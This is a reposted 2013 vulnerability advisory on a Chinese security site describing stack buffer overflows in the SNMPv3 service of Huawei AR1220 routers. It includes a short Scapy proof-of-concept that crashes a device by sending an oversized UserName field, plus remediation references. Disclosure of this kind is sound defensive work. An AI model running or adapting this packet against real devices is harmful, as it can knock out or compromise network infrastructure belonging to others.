首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Huawei SNMPv3 Buffer Overflow Vulnerability
来源:roberto.paleari@emaze.net 作者:Paleari 发布时间:2013-05-07  
Multiple buffer overflows on Huawei SNMPv3 service
==================================================

[ADVISORY INFORMATION]
Title:    Multiple buffer overflows on Huawei SNMPv3 service
Discovery date: 11/02/2013
Release date:   06/05/2013
Credits:   Roberto Paleari (roberto.paleari@emaze.net, @rpaleari)
Advisory URL:   http://blog.emaze.net/2013/05/multiple-buffer-overflows-on-huawei.html

[VULNERABILITY INFORMATION]
Class:           Memory errors

[AFFECTED PRODUCTS]
We confirm the presence of these security vulnerabilities on the following
products:
   * Huawei AR1220 (firmware version V200R002C02SPC121T)
According to Huawei security advisories [2,3] other products are also
vulnerable, but they were not checked.

[VULNERABILITY DETAILS]
The Huawei SNMPv3 service running on the affected devices is vulnerable to
multiple stack-based buffer overflow issues. These vulnerabilities can be
exploited by unauthenticated remote attackers.

The issues concern Huawei implementation of the SNMPv3 User-based Security
Model (USM [1]). Strictly speaking, attackers can overflow the
"AuthoritativeEngineID" and "UserName" SNMPv3 USM fields.

The vulnerabilities we identified can be classified according to the
exploitation context: some issues can be triggered only when SNMP debugging is
enabled, while others are exploitable in the default device configuration.

The first class of issues can be exploited only when SNMP debugging is enabled,
as they are related with the debugging code that displays the content of
incoming SNMP packets. Attackers can leverage these issues to achieve RCE, but
the actual impact is quite low, as SNMP debugging is usually disabled during
normal operation.

The second class of vulnerabilities affects the SNMPv3 packet decoder.
Differently than the previous ones, these issues can be exploited in the
default device configuration. Additionally, it is worth considering that ACLs
are ineffective at mitigating this threat, as SNMPv3 packets are processed by
the device even if the sender's IP is not included in the ACL. Similarly, the
vulnerabilities can be exploited even when no SNMPv3 users are configured.

In the following we include a "proof-of-concept" that exploit the latter
category. Our PoC simply crashes the device, but the payload can probably be
also adapted to achieve RCE.

This Python example crashes the device by overflowing the "UserName" SNMPv3 USM
field. Consider we used a slightly modified version of Python Scapy library to
properly support the SNMPv3 protocol. The complete Python script and the
modified Scapy library can be provided upon request.

<cut>
from scapy.all import *

def main():
    DST = "192.168.1.1"

    snmp = SNMPv3(version=3)
    pkt = IP(dst=DST)/UDP(sport=RandShort(), dport=161)/snmp
    pkt = snmpsetauth(pkt, "emaze", "MD5")
    pkt["SNMPv3"].flags = 4

    # Replace "user_name" with "auth_engine_id" in the next line to trigger the
    # other overflow
    pkt["SNMPv3"].security.user_name = "A"*4096

    pkt.show()
    send(pkt)

if __name__ == "__main__":
    main()
</cut>

[REMEDIATION] 
The device manufacturer has released updated firmware versions that should
remediate these issues. Huawei security advisories are available at [2,3].

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide.
Permission is hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service to the
professional security community. There are NO WARRANTIES with regard to this
information. Any application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is subject to change
without notice.

Footnotes:
[1] http://www.ietf.org/rfc/rfc2574.txt
[2] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260601.htm
[3] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260626.htm


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AudioCoder .M3U Buffer Overflo
·Microsoft Internet Explorer CG
·Winarchiver 3.2 Buffer Overflo
·Dovecot with Exim sender_addre
·FuzeZip 1.0.0.131625 Buffer Ov
·MoinMelt Arbitrary Command Exe
·ABBS Audio Media Player v3.1 (
·ColdFusion 9 / 10 Remote Root
·DVD X Player 5.5.37 Pro / Stan
·Flightgear 2.0, 2.4 - Remote F
·Easy Icon Maker Version 5.01 C
·Linux Kernel open-time Capabil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved